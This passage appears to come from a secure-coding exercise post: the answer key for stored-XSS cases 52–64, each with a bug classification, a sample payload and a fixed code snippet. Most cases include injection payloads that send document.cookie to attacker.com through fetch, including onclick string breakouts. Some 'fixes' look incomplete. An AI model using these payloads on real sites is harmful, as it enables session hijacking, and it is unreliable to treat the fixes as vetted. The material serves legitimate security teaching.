class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">);</span> <span class="nx">email</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`Email: </span><span class="p">${</span><span class="nx">emp</span><span class="p">.</span><span class="nx">email</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="nx">card</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">name</span><span class="p">);</span> <span class="nx">card</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">role</span><span class="p">);</span> <span class="nx">card</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">email</span><span class="p">);</span> <span class="nx">results</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">card</span><span class="p">);</span> <span class="p">});</span> </code></pre> </div> <h3> Case 52 — Answer </h3> <ol> <li><p>Stored XSS. Missing Escaping.</p></li> <li><p>Sample payload for SQL entry row:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>ticket-subject: &lt;img src=x onerror="fetch('https://attacker.com/?q='+document.cookie)"&gt; ticket-message: &lt;img src=x onerror="fetch('https://attacker.com/?q='+document.cookie)"&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">function</span> <span class="nf">showTicket</span><span class="p">(</span><span class="nx">id</span><span class="p">,</span> <span class="nx">subject</span><span class="p">,</span> <span class="nx">message</span><span class="p">,</span> <span class="nx">status</span><span class="p">)</span> <span class="p">{</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">ticket-id</span><span class="dl">"</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">id</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">ticket-subject</span><span class="dl">"</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">subject</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">ticket-message</span><span class="dl">"</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">message</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">ticket-status</span><span class="dl">"</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">status</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <h3> Case 53 — Answer </h3> <ol> <li><p>There is no XSS bug here. Only display issues.</p></li> <li><p>No relevant payload.</p></li> <li><p>Fix:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/ticket</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">submit_ticket</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">):</span> <span class="n">data</span> <span class="o">=</span> <span class="k">await</span> <span class="n">request</span><span class="p">.</span><span class="nf">json</span><span class="p">()</span> <span class="n">name</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">issue</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">issue</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">INSERT INTO tickets (name, issue) VALUES (?, ?)</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">issue</span><span class="p">)</span> <span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">submitted</span><span class="sh">"</span><span class="p">}</span> </code></pre> </div> <h3> Case 54 — Answer </h3> <ol> <li><p>Stored XSS. Wrong context escaping. Stored XSS in Javascript string context inside <code>onclick</code>. There is also a Stored XSS in innerHTML DOM sink.</p></li> <li><p>Payload for <code>note.title</code> via innerHTML sink:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>note.title: &lt;/h2&gt;&lt;img src=x onerror="fetch('https://attacker.com/?q='+document.cookie)"&lt;h2&gt; note.body: &lt;/p&gt;&lt;img src=x onerror="fetch('https://attacker.com/?q='+document.cookie)"&lt;p&gt; </code></pre> </div> <p>Payload for <code>note.title</code> via onclick breakout:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>note.title: '); fetch('https://attacker.com/?q='+document.cookie);// </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- notes.html --&gt;</span> <span class="nt">&lt;ul&gt;</span> {% for note in notes %} <span class="nt">&lt;li</span> <span class="na">onclick=</span><span class="s">"showNote({{ note.title | tojson }}, {{ note.body | tojson }})"</span><span class="nt">&gt;</span> {{ note.title }} <span class="nt">&lt;/li&gt;</span> {% endfor %} <span class="nt">&lt;/ul&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nf">showNote</span><span class="p">(</span><span class="nx">title</span><span class="p">,</span> <span class="nx">body</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">notedisplay</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">note-display</span><span class="dl">"</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">t</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">h2</span><span class="dl">'</span><span class="p">);</span> <span class="nx">t</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">title</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">b</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">);</span> <span class="nx">b</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">body</span><span class="p">;</span> <span class="nx">notedisplay</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">t</span><span class="p">);</span> <span class="nx">notedisplay</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">b</span><span class="p">);</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <h3> Case 55 — Answer </h3> <ol> <li><p>Stored XSS. Missing escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">POST /comment author=&lt;/strong&gt;&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt;&lt;strong&gt;&amp;body=&lt;/p&gt;&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt;&lt;p&gt; </span></code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="kn">from</span> <span class="n">markupsafe</span> <span class="kn">import</span> <span class="n">escape</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="n">comments</span> <span class="o">=</span> <span class="p">[]</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/comment</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">post_comment</span><span class="p">():</span> <span class="n">author</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">author</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">body</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">body</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">comments</span><span class="p">.</span><span class="nf">append</span><span class="p">({</span> <span class="sh">"</span><span class="s">author</span><span class="sh">"</span><span class="p">:</span> <span class="nf">escape</span><span class="p">(</span><span class="n">author</span><span class="p">),</span> <span class="sh">"</span><span class="s">body</span><span class="sh">"</span><span class="p">:</span> <span class="nf">escape</span><span class="p">(</span><span class="n">body</span><span class="p">),</span> <span class="p">})</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Comment posted.</span><span class="sh">"</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/comments</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">view_comments</span><span class="p">():</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">comments.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">comments</span><span class="o">=</span><span class="n">comments</span><span class="p">)</span> </code></pre> </div> <h3> Case 56 — Answer </h3> <ol> <li><p>Stored XSS. Missing escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>post.body: &lt;/div&gt;&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt;&lt;div&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- posts.html --&gt;</span> {% for post in posts %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"post"</span><span class="nt">&gt;</span> <span class="nt">&lt;h2&gt;</span>{{ post.title }}<span class="nt">&lt;/h2&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"body"</span><span class="nt">&gt;</span>{{ post.body }}<span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/div&gt;</span> {% endfor %} </code></pre> </div> <h3> Case 57 — Answer </h3> <ol> <li><p>Stored XSS. Missing escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>review.author: &lt;/strong&gt;&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt;&lt;strong&gt; review.body: &lt;/p&gt;&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt;&lt;p&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Review</span> <span class="k">def</span> <span class="nf">review_list</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">reviews</span> <span class="o">=</span> <span class="n">Review</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">all</span><span class="p">()</span> <span class="n">processed</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">review</span> <span class="ow">in</span> <span class="n">reviews</span><span class="p">:</span> <span class="n">processed</span><span class="p">.</span><span class="nf">append</span><span class="p">({</span> <span class="sh">"</span><span class="s">author</span><span class="sh">"</span><span class="p">:</span> <span class="n">review</span><span class="p">.</span><span class="n">author</span><span class="p">,</span> <span class="sh">"</span><span class="s">stars</span><span class="sh">"</span><span class="p">:</span> <span class="n">review</span><span class="p">.</span><span class="n">stars</span><span class="p">,</span> <span class="sh">"</span><span class="s">body</span><span class="sh">"</span><span class="p">:</span> <span class="n">review</span><span class="p">.</span><span class="n">body</span><span class="p">,</span> <span class="p">})</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">reviews.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">reviews</span><span class="sh">"</span><span class="p">:</span> <span class="n">processed</span><span class="p">})</span> </code></pre> </div> <h3> Case 58 — Answer </h3> <ol> <li><p>Stored XSS. Missing escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>item.title: &lt;/h2&gt;&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt;&lt;h2&gt; item.body: &lt;/p&gt;&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt;&lt;p&gt; item.author: attacker&lt;/small&gt;&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt;&lt;small&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- announcements.html --&gt;</span> {% for item in items %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"announcement"</span><span class="nt">&gt;</span> <span class="nt">&lt;h2&gt;</span>{{ item.title }}<span class="nt">&lt;/h2&gt;</span> <span class="nt">&lt;p&gt;</span>{{ item.body }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;small&gt;</span>Posted by: {{ item.author }}<span class="nt">&lt;/small&gt;</span> <span class="nt">&lt;/div&gt;</span> {% endfor %} </code></pre> </div> <h3> Case 59 — Answer </h3> <ol> <li><p>Stored XSS. Wrong context escaping. Must do Javascript context escaping for the <code>badge</code>.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>badge: &lt;script&gt;fetch('https://attacker.com?q='+document.cookie);&lt;/script&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Product</span> <span class="k">def</span> <span class="nf">product_detail</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">product_id</span><span class="p">):</span> <span class="n">product</span> <span class="o">=</span> <span class="n">Product</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nb">id</span><span class="o">=</span><span class="n">product_id</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">product.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">product</span><span class="sh">"</span><span class="p">:</span> <span class="n">product</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- product.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>{{ product.name }}<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;p&gt;</span>{{ product.description }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"badge"</span><span class="nt">&gt;</span>{{ product.badge_html }}<span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 60 — Answer </h3> <ol> <li><p>Stored XSS. Missing Escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>comment.author: &lt;/strong&gt;&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt;&lt;strong&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Comment</span> <span class="k">def</span> <span class="nf">comment_list</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">comments</span> <span class="o">=</span> <span class="n">Comment</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">all</span><span class="p">()</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">comments.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">comments</span><span class="sh">"</span><span class="p">:</span> <span class="n">comments</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- comments.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Comments<span class="nt">&lt;/h1&gt;</span> {% for comment in comments %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"comment"</span><span class="nt">&gt;&lt;strong&gt;</span>{{ comment.author }}<span class="nt">&lt;/strong&gt;</span>{{ comment.body }} {% endfor %} <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 61 — Answer </h3> <ol> <li><p>Stored XSS. Missing Escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;/span&gt;&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">"fetch('https://attacker.com/?q='+document.cookie)"</span><span class="nt">&gt;&lt;span&gt;</span> </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># models.py </span><span class="kn">from</span> <span class="n">django.db</span> <span class="kn">import</span> <span class="n">models</span> <span class="k">class</span> <span class="nc">UserProfile</span><span class="p">(</span><span class="n">models</span><span class="p">.</span><span class="n">Model</span><span class="p">):</span> <span class="n">username</span> <span class="o">=</span> <span class="n">models</span><span class="p">.</span><span class="nc">CharField</span><span class="p">(</span><span class="n">max_length</span><span class="o">=</span><span class="mi">150</span><span class="p">)</span> <span class="n">role</span> <span class="o">=</span> <span class="n">models</span><span class="p">.</span><span class="nc">CharField</span><span class="p">(</span><span class="n">max_length</span><span class="o">=</span><span class="mi">50</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_username_display</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">username</span> <span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">format_html</span> <span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">UserProfile</span> <span class="k">def</span> <span class="nf">profile_page</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">user_id</span><span class="p">):</span> <span class="n">profile</span> <span class="o">=</span> <span class="n">UserProfile</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nb">id</span><span class="o">=</span><span class="n">user_id</span><span class="p">)</span> <span class="n">badge</span> <span class="o">=</span> <span class="nf">format_html</span><span class="p">(</span> <span class="sh">'</span><span class="s">&lt;span class=</span><span class="sh">"</span><span class="s">badge role-{}</span><span class="sh">"</span><span class="s">&gt;{}&lt;/span&gt;</span><span class="sh">'</span><span class="p">,</span> <span class="n">profile</span><span class="p">.</span><span class="n">role</span><span class="p">,</span> <span class="n">profile</span><span class="p">.</span><span class="nf">get_username_display</span><span class="p">(),</span> <span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">'</span><span class="s">profile.html</span><span class="sh">'</span><span class="p">,</span> <span class="p">{</span><span class="sh">'</span><span class="s">badge</span><span class="sh">'</span><span class="p">:</span> <span class="n">badge</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# profile.html #} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"profile-header"</span><span class="nt">&gt;</span> {{ badge }} <span class="nt">&lt;/div&gt;</span> </code></pre> </div> <h3> Case 62 — Answer </h3> <ol> <li><p>Stored XSS. Wrong Context Escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;/li&gt;&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">"fetch('https://attacker.com/?q='+document.cookie)"</span><span class="nt">&gt;&lt;li&gt;</span> </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Notification</span> <span class="k">def</span> <span class="nf">notifications_page</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">notifications</span> <span class="o">=</span> <span class="n">Notification</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">filter</span><span class="p">(</span> <span class="n">user</span><span class="o">=</span><span class="n">request</span><span class="p">.</span><span class="n">user</span> <span class="p">).</span><span class="nf">values_list</span><span class="p">(</span><span class="sh">'</span><span class="s">message</span><span class="sh">'</span><span class="p">,</span> <span class="n">flat</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> <span class="n">safe_notifications</span> <span class="o">=</span> <span class="p">[</span><span class="n">msg</span> <span class="k">for</span> <span class="n">msg</span> <span class="ow">in</span> <span class="n">notifications</span><span class="p">]</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">'</span><span class="s">notifications.html</span><span class="sh">'</span><span class="p">,</span> <span class="p">{</span> <span class="sh">'</span><span class="s">notifications</span><span class="sh">'</span><span class="p">:</span> <span class="n">safe_notifications</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# notifications.html #} <span class="nt">&lt;script&gt;</span> <span class="kd">const</span> <span class="nx">notifications</span> <span class="o">=</span> <span class="p">[</span> <span class="p">{</span><span class="o">%</span> <span class="k">for</span> <span class="nx">msg</span> <span class="k">in</span> <span class="nx">notifications</span> <span class="o">%</span><span class="p">}</span> <span class="dl">"</span><span class="s2">{{ msg | escapejs }}</span><span class="dl">"</span><span class="p">,</span> <span class="p">{</span><span class="o">%</span> <span class="nx">endfor</span> <span class="o">%</span><span class="p">}</span> <span class="p">];</span> <span class="kd">function</span> <span class="nf">renderNotifications</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">container</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">notif-list</span><span class="dl">'</span><span class="p">);</span> <span class="nx">notifications</span><span class="p">.</span><span class="nf">forEach</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">msg</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">li</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">li</span><span class="dl">'</span><span class="p">);</span> <span class="nx">li</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">msg</span><span class="p">;</span> <span class="nx">container</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">li</span><span class="p">);</span> <span class="p">});</span> <span class="p">}</span> <span class="nf">renderNotifications</span><span class="p">();</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;ul</span> <span class="na">id=</span><span class="s">"notif-list"</span><span class="nt">&gt;&lt;/ul&gt;</span> </code></pre> </div> <h3> Case 63 — Answer </h3> <ol> <li><p>Stored XSS. Missing Escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;script&gt;</span><span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://attacker.com/?q=</span><span class="dl">'</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">);</span><span class="nt">&lt;/script&gt;</span> </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># utils.py </span> <span class="c1"># views.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">render_template</span><span class="p">,</span> <span class="n">request</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Comment</span> <span class="k">def</span> <span class="nf">comment_feed</span><span class="p">():</span> <span class="n">comments</span> <span class="o">=</span> <span class="n">Comment</span><span class="p">.</span><span class="n">query</span><span class="p">.</span><span class="nf">order_by</span><span class="p">(</span> <span class="n">Comment</span><span class="p">.</span><span class="n">created_at</span><span class="p">.</span><span class="nf">desc</span><span class="p">()</span> <span class="p">).</span><span class="nf">limit</span><span class="p">(</span><span class="mi">20</span><span class="p">).</span><span class="nf">all</span><span class="p">()</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">'</span><span class="s">feed.html</span><span class="sh">'</span><span class="p">,</span> <span class="n">previews</span><span class="o">=</span><span class="n">comments</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# feed.html #} {% for preview in previews %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"comment-card"</span><span class="nt">&gt;</span> <span class="nt">&lt;span</span> <span class="na">class=</span><span class="s">"author"</span><span class="nt">&gt;</span>{{ preview.author }}<span class="nt">&lt;/span&gt;</span>: {{ preview.preview_text }} <span class="nt">&lt;/div&gt;</span> {% endfor %} </code></pre> </div> <h3> Case 64 — Answer </h3> <ol> <li><p>Stored XSS. Wrong Context Escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="dl">'</span><span class="se">\'</span><span class="s1">); fetch(</span><span class="dl">'</span><span class="nx">https</span><span class="p">:</span><span class="c1">//attacker.com/?q='+document.cookie) ; //</span> </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.contrib.auth.decorators</span> <span class="kn">import</span> <span class="n">login_required</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">BlogPost</span> <span class="nd">@login_required</span> <span class="k">def</span> <span class="nf">post_detail</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">post_id</span><span class="p">):</span> <span class="n">post</span> <span class="o">=</span> <span class="n">BlogPost</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nb">id</span><span class="o">=</span><span class="n">post_id</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">'</span><span class="s">post_detail.html</span><span class="sh">'</span><span class="p">,</span> <span class="p">{</span><span class="sh">'</span><span class="s">post</span><span class="sh">'</span><span class="p">:</span> <span class="n">post</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# post_detail.html #} <span class="nt">&lt;h1&gt;</span>{{ post.title }}<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"share-bar"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">postTitle</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">{{ post.title | escapejs }}</span><span class="dl">"</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">shareMsg</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Check out: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">postTitle</span><span class="p">;</span> <span class="kd">function</span> <span class="nf">buildShareBar</span><span class="p">(</span><span class="nx">msg</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">shareBar</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span 